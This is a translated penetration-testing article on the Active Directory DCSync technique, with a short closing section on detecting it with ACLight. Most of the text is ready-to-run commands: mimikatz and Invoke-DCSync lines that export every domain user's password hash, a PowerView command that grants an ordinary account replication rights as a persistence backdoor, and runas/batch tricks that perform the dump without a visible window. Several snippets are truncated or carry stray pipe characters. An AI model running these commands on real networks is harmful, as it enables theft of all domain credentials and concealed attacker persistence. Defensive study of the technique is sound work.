0x00 Preface
---
DCSync is a frequently used technique in domain penetration. This article will compile open-source materials, combine personal experience, and summarize methods for exploitation, defense, and detection.
0x01 Introduction
---
This article will cover the following topics:
- Method to export all domain user hashes using DCSync
- Method to maintain persistence within the domain using DCSync
- Automated detection methods for DCSync backdoors
0x02 Method to export all domain user hashes using DCSync
---
DCSync is a feature added to mimikatz in 2015, co-authored by Benjamin DELPY gentilkiwi and Vincent LE TOUX, capable of exporting hashes of all users within the domain.
Prerequisites:
Obtain permissions for any of the following users:
- Users in the Administrators group
- Users in the Domain Admins group
- Users in the Enterprise Admins group
- Computer account of the domain controller
Exploitation principle:
Utilize the DRS (Directory Replication Service) protocol to replicate user credentials from the domain controller via IDL_DRSGetNCChanges
Reference materials:
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47
Implementation code:
https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c#L27
Exploitation method:
1. Use mimikatz
Export hashes of all users in the domain:
mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit |
Export hash of the administrator account in the domain:
mimikatz.exe "lsadump::dcsync /domain:test.com /user:administrator /csv" exit |
2. PowerShell Implementation
https://gist.github.com/monoxgas/9d238accd969550136db
Calling the dcsync function in mimikatz.dll via Invoke-ReflectivePEinjection
Export hashes of all users in the domain:
Invoke-DCSync -DumpForest | ft -wrap -autosize |
Export the hash of the administrator account in the domain:
Invoke-DCSync -DumpForest -Users @("administrator") | ft -wrap -autosize |
Note:
After obtaining the hashes of domain users, further exploitation can refer to previous articles:
"Domain Penetration - Implementation of Pass The Hash"
"Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin mode)"
"Domain Penetration - Pass The Hash & Pass The Key"
0x03 Methods for Maintaining Domain Privileges Using DCSync
---
Exploitation Conditions:
Obtain the permissions of any of the following users:
- Users within the Domain Admins group
- Users within the Enterprise Admins group
Exploitation Principle:
Add the following three ACEs (Access Control Entries) to a regular user in the domain:
- DS-Replication-Get-Changes (GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)
- DS-Replication-Get-Changes-All (GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)
- DS-Replication-Get-Changes (GUID: 89e95b76-444d-4c62-991a-0facbeda640c)
This user will then gain the permission to export all user hashes in the domain using DCSync
Implementation Code:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1#L8270
Exploitation Method:
The command to add ACEs is as follows:
Add-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test1 -Rights DCSync -Verbose |
Supplement:
Command to remove ACE:
Remove-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test1 -Rights DCSync -Verbose |
Note:
For more information on ACLs, refer to the previous article: 'Penetration Techniques – Access Control List in Windows'
The method to invoke DCSync using domain user test1 is as follows:
1. On a domain-joined host logged in as user test1, directly use the DCSync feature of mimikatz
mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.com /all /csv" exit |
2. Use runas to log in as user test1, then perform DCSync
(1) Pop up a cmd window
echo 123456789 | runas /noprofile /user:test\test1 cmd |
Execute the following command in the popped-up cmd window:
mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.com /all /csv" exit |
(2) Execute without popping up a window
echo 123456789 | runas /noprofile /user:test\test1 c:\test\1.bat |
The content of 1.bat is as follows:
c:\test\mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.com /user:administrator /csv" exit>c:\test\1.txt |
Note:
Similar tools include lsrunas, lsrunase, and CPAU
3. Using PowerShell to log in as user test1, then performing DCSync
(1) Launch cmd
$uname="test\test1" |
Execute the following command in the launched cmd:
mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.com /user:administrator /csv" exit |
(2) Implement without pop-up window
$uname="test\test1" |
The content of 1.bat is as follows:
c:\test\mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.com /user:administrator /csv" exit>c:\test\1.txt |
Note:
Using wmic to log in as user test1 on the local machine will fail with the following error:
ERROR: |
0x04 Automated Detection Method for DCSync Backdoors
---
Users with high privileges but not in high-privilege groups are referred to as Shadow Admins, such as the domain user test1 in 0x03. Simply querying members of high-privilege groups cannot reveal Shadow Admins within the domain.
Detection Principle:
Enumerate the ACLs of all users in Active Directory and flag privileged accounts.
Implementation Code:
https://github.com/cyberark/ACLight
Exploitation Conditions:
- Powershell v3.0
- Domain User Privileges
Detection Method:
Execute Execute-ACLight2.bat from the project
Three files will be generated:
- Privileged Accounts - Layers Analysis.txt
- Privileged Accounts Permissions - Final Report.csv
- Privileged Accounts Permissions - Irregular Accounts.csv
The files will display all privileged accounts
Testing shows that ACLight can detect user test1 with DCSync permissions added
0x05 Summary
---
This article introduces the exploitation of DCSync in domain penetration and automated detection methods. From a defensive perspective, it is recommended to use ACLight to detect user ACLs in the domain environment